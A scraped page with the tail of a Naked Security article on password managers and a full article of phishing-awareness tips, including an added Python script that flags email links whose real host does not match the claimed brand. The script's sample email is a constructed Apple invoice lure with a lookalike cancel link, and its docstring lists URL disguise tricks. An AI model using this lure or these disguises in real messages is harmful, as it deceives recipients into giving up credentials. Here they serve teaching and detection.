If you find the convenience of cloud solutions to be more your style, a cloud-based password manager may be more your speed. Many Naked Security readers have commented that LastPass and 1Password are their choices for cloud-based password managers, but there are many, many others in the market, including Google’s Smart Lock and Apple’s iCloud Keychain. Sophos’s mobile security apps Sophos Mobile Security and Sophos Secure Workspace can both use local KeePass vaults, and Sophos Secure Workspace can work with multiple local or cloud-based vaults.

If you’re not sure where you fall on this debate, you’re not the only one. There’s something to be said for healthy skepticism about either “side,” especially if someone declares that something is the best solution for everyone in every situation.

As with most decisions around what’s best for your privacy and security, there are a number of risk/reward calculations that you need to make to determine what’s right for you.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/qnqAqdOiA4Y/

3 simple tips to stay off the hook this phishing season

We’re entering peak retail season.

Black Friday, Cyber Monday, Hanukkah, Kwanzaa, Christmas, Boxing Day, the New Year Sales – it’s the start of a long season of giving and receiving, buying and selling, visiting shops and going online to shop around.

You’re likely to be looking for things you don’t buy every day, from retailers you don’t deal with every day.

So, even if you’re shopping in-store, you can expect plenty of online action via SMS, web and email – invoices, receipts, confirmations, deliveries, acknowledgements…

…and that’s just for the things you’ve already bought.

On top of all that, you’ll get any number of special offers, solicited and unsolicited, expected and unexpected, genuine and scammy.

We know that the majority of Naked Security readers are strongly interested in IT and computer security, as well as partly or fully responsible for security at work or at home (or, more likely, both).

So, even if you could spot a phish at 100 paces, what about your friends, family and colleagues?

We thought it might help if we put together a brief “story in pictures” to help you do the explaining.

Here goes.

Down memory lane

Here’s a phish from a few years ago, when the crooks first realised that getting your email password was as good as getting your banking credentials – or perhaps even better, given that your email password is often the key to resetting the passwords on dozens of other accounts:

Although you’ll still see phishes like this, by today’s standards it is rather obviously suspicious – in slang terms, you might call it “amateur-time”.

Nothing about it quite adds up – it has an unprofessional look, uses colours that Outlook.com doesn’t, mentions a mail limit that’s completely different from real life, and is written in illiterate, mis-spelled English.

Unfortunately, you can’t rely on every crook being this slapdash, so you will often see phishes that are much more believable – technically and visually.

In other words: “it looks like garbage” is a good rule for getting rid of spams and scams, but “it looks OK” is not good enough on its own for accepting an email or a web page.

KISS

Some crooks have realised that the shorter, sweeter and simpler you keep an attack, the easier it is to pass muster, like this SMS scam campaign from Australia:

See what they did there?

SMSes are so short that it’s easy to produce a grammatically correct message, especially if all the message says is, “You have a message.”

Worse still, SMSes, like tweets, often contain shortened web links to save space, making it easier for the crooks to pass off a rotten domain as a safe-looking one.

Don’t be in a hurry to click, especially if the message claims to relate to a service you already use.

After all, if your bank sends you a message about a message, you don’t need a link because you already know how to get to the right page on your banking website by yourself.

Good looks

Sometimes, crooks go to a bit more effort than the Outlook.com example we showed above.

Here are some recent examples from our spamtraps where the crooks have “borrowed” the icons and visual flavour of one of the world’s most popular computer brands, Apple:

Fortunately, even these crooks haven’t taken as much care as they could have, but if you’re in a hurry, or aren’t a native speaker of English, these messages look plausible enough.

But let’s not rush into it – let’s try what Staysafeonline.org suggests: Stop. Think. Connect.

Try this logic for size:

  • If these messages are true, you don’t need to click – you can just head over to Apple’s website manually, or open the AppStore app yourself.
  • If the messages are not true, you don’t want to click, for obvious reasons.
  • Therefore, true or false, your best action is not to click.

Easy, isn’t it? Don’t click!

Click to cancel

Some crooks take a more subtle approach than threatening you with a generic problem with your whole account.

Instead, the crooks pretend to have processed a specific transaction, often for a fairly modest amount (but not so small that you’re likely to ignore it)…

…and below the invoice, they helpfully provide a button to dispute or to cancel the transaction if you think it’s fraudulent.

It’s tempting to take a look “just in case”, especially if you have recently bought items via Apple and wonder if this might be one you forgot about, or if you’re worried that your kids have been spending your money in the AppStore behind your back.

Don’t do it!

Don’t click through “just in case”, even if the purchase is the same as or similar to one you did make.

Popular advice says to hover over the link you’re about to click, thus popping up a box that shows where you’re about to go, to help you check in advance whether you’re heading to a real site like apple.com or an imposter that’s nothing to do with Apple.

We have a simpler approach: ignore all the links entirely in any email like this, for exactly the reasons we’ve discussed above.

If the transaction is real, you will find it by logging into your Apple account without any email help, so there’s no point in clicking.

If the transaction is fake, there’s no point in clicking.
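Hover-to-check only works if you know what to look for in the popup, and as the SMS section above points out, a shortened link shows you nothing useful at all. The following added example (not from the article) does that check programmatically for a whole email body: it extracts every link, looks at where the href really points rather than what the link text says, and decides whether the host genuinely belongs to the brand the message claims to be from. For a shortener the only honest verdict is “shortened, destination unknown”. The brand domain list, the shortener list and the sample HTML are assumptions constructed for the example.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Added example, not part of the original article: an automated version of
# "hover over the link and read the real destination". The brand list, the
# shortener list and the sample email are assumptions made for the example.

# Domains that genuinely belong to the brand a message claims to come from.
BRAND_DOMAINS = {
    "apple": ("apple.com", "icloud.com"),
    "outlook": ("outlook.com", "live.com", "microsoft.com"),
}
# Link shorteners hide the real host, so the verdict has to be "shortened".
SHORTENERS = {"bit.ly", "t.co", "tinyurl.com", "goo.gl", "ow.ly"}


def host_belongs_to(url: str, domain: str) -> bool:
    """True only if the URL's host is `domain` itself or a subdomain of it.

    Works on the parsed hostname, so the usual disguises fail:
      https://apple.com.update-check.example/...   (brand as a leading label)
      https://evil.example/apple.com/login          (brand in the path)
      https://apple.com@evil.example/               (brand as fake userinfo)
      http://192.0.2.10/apple.com                   (bare IP address)
    """
    parts = urlsplit(url.strip())
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    host = parts.hostname.lower().rstrip(".")
    try:
        ipaddress.ip_address(host)
        return False  # brands do not send customers to raw IP addresses
    except ValueError:
        pass
    domain = domain.lower()
    return host == domain or host.endswith("." + domain)


def classify_link(url: str, brand: str) -> str:
    """'ok', 'shortened' or 'suspicious' for a link in mail claiming to be from `brand`."""
    host = (urlsplit(url.strip()).hostname or "").lower()
    if host in SHORTENERS:
        return "shortened"
    if any(host_belongs_to(url, d) for d in BRAND_DOMAINS.get(brand.lower(), ())):
        return "ok"
    return "suspicious"


class _LinkExtractor(HTMLParser):
    """Collects (href, visible link text) pairs from <a> tags in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href"), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def audit_email(html: str, brand: str):
    """Return [(href, link text, verdict)] for every link in the message body."""
    parser = _LinkExtractor()
    parser.feed(html)
    return [(href, text, classify_link(href, brand)) for href, text in parser.links]


# Constructed sample resembling the "click to cancel" invoice lure described above.
SAMPLE_EMAIL = """
<p>Your receipt from Apple: AppStore purchase of 'Premium Weather' for $39.99.</p>
<p>If you did not authorise this purchase,
   <a href="https://apple.com.billing-dispute.example/cancel">click here to cancel</a>.</p>
<p><a href="https://bit.ly/3xAMPLe">View full invoice</a></p>
<p><a href="https://www.apple.com/legal/">apple.com/legal</a></p>
"""

if __name__ == "__main__":
    for href, text, verdict in audit_email(SAMPLE_EMAIL, "apple"):
        print(f"{verdict:10s} {text!r:30s} -> {href}")
```

The important detail is in host_belongs_to: it compares the parsed hostname against the brand’s domain as a whole sequence of labels, so apple.com.billing-dispute.example, a path that merely contains apple.com, or apple.com placed as a fake username before an @ all fail, which are exactly the tricks that make a hovered URL “look OK” at a glance. In a real mail pipeline you would also expand shorteners in a sandbox and run the same check on the final destination; on the page here, the simpler advice still applies: if the verdict isn’t “ok”, don’t click, and if it is, you still don’t need to.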

If in doubt…

To leave you with some short and simple messages you can give to your friends and family this holiday season:

  1. For personal information. If in doubt, don’t give it out.
  2. For web links. If in doubt, don’t connect out.
  3. For website forms. If in doubt, don’t fill it out.

TL;DR – IF IN DOUBT…DON’T.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/ScfkRGUoIJY/